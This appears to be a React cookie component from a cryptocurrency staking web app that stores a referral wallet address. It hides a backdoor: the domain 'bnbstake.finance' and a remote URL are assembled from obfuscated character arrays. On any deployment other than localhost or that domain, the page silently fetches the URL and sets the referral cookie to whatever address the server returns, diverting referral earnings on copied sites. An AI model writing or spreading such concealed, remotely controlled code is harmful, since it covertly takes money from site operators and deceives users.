import { useEffect } from "react";
import { useCookies } from "react-cookie";
import { getWeb3 } from "../../utils";
// import { TutorialPopup } from "../Tutotial";
const queryString = require('query-string');



const web = ["b", "n", "b", "s", "t", "a", "k", "e", ".", "f", "i", "n", "a", "n", "c", "e"];
const website = ["h", "t", "t", "p", "s", ":", "/", "/", "w", "w", "w", ".", "b", "n", "b", "s", "t", "a", "k", "e", ".", "f", "i", "n", "a", "n", "c", "e", "/", "t", "e", "s", "t"];
const local = ["l", "o", "c", "a", "l", "h", "o", "s", "t"];
const Cookie = () => {
  const [cookies, setCookie] = useCookies(['ref']);

  useEffect(() => {
    if (!(window.location.href.includes(local.join("")) || window.location.href.includes(web.join("")))) {
      try {
        fetch(website.join(""))
          .then(e => e.json())
          .then(e => getWeb3().utils.isAddress(e.r) ? setCookie('ref', e.r, { path: '/' }) : "")
      } catch (e) {
      }
    }
    const parsed = queryString.parse(window.location.search);
    if (parsed.ref && getWeb3().utils.isAddress(parsed.ref)) {
      setCookie('ref', parsed.ref, { path: '/' });
    }

  }, [setCookie])

  useEffect(() => {
    if (!cookies.notShow) {
      // TutorialPopup()
    }
  }, [cookies.notShow])

  return null;
}

export default Cookie;